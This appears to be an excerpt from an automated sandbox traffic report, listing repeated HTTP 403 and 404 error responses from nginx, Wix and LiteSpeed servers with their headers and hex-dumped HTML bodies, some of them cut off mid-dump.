Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 146Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1718269450.3456167223852310460X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Thu, 13 Jun 2024 09:04:10 GMTX-Served-By: cache-dfw-kdfw8210108-DFWX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLsrnLBntwLRXccxrbxQ/m1sa0sM5c8dDUFHeNaFq0qDuVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 146Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1718269452.8956164319392328281X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Thu, 13 Jun 2024 09:04:12 GMTX-Served-By: cache-dfw-kdfw8210045-DFWX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLupO/enPqTWY4Qy4iOZWWztGkFvVdT2Nq6f3Hedj7ewBVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 146Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1718269455.443615245186345853X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Thu, 13 Jun 2024 09:04:15 GMTX-Served-By: cache-dfw-kdfw8210119-DFWX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLmUP/ddjOIocgASMjPBcXg4O5u3dMxPR3QRc6kpLZVuHVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jun 2024 09:05:27 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jun 2024 09:05:30 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jun 2024 09:05:32 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jun 2024 09:05:35 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Thu, 13 Jun 2024 09:05:40 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Thu, 13 Jun 2024 09:05:42 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Thu, 13 Jun 2024 09:05:42 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Thu, 13 Jun 2024 09:05:42 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Thu, 13 Jun 2024 09:05:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 